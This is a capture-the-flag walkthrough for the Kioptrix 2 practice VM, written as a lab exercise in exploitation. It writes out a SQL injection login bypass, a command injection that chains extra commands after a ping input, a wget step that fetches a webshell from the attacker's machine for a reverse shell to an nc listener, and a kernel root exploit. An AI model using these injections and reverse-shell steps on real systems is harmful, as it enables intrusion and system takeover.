Kioptrix 2 is B2R VM designed for students to practice vulnerability analysis and exploitation. Objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise
- VMWare workstation for Virtual Machines
- Kali Linux VM in Bridge mode
- Kioptrix in Bridge mode
- Kali Linux VM
- SQL Injection
- Command Execution
- Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root
Target VM IP Address: 192.168.8.105
nmap -p- -A –webxml -oX nmap-kioptrix2.xml 192.168.8.105
Found website is running on port 80.
Found sql injection in website.
“admin’ or 1=1 — -”
Found command execution. Our goal is to upload webshell. We need to find utility that will download our webshell, either wget, nc, etc… and a writable direcotyr.
127.0.0.1; pwd; ls -al; id; whereis wget
wget is available on server. We can use wget to download webshell over server. but we can not upload webshell in /var/ww/html? coz, this directory is owned by root, and everyone does not have access to write to this directory. No problem, we can use /tmp for webshell uploading with this command.
#127.0.0.1; wget 192.168.8.104/shell.txt -O /tmp/shell.php; php /tmp/shell.php
But before executing above command in lets configure webshell with reverse ip address to our kali linux machine and start web server as:
#service apache2 start
and also, nc listener
#nc -nvlp 1234
Received interactive shell.
Lets check operating system and kernel version, and check if any exploit is available.
I dont know, why each character is typed 2 times 😦
Search through exploitdb found exploit for centos 4.5
Move to exploit directory and start SimpleHTTPServer python module as:
#python -m SimpleHTTPServer 8888
and on target VM download exploit code,
Congrats! We are root!!!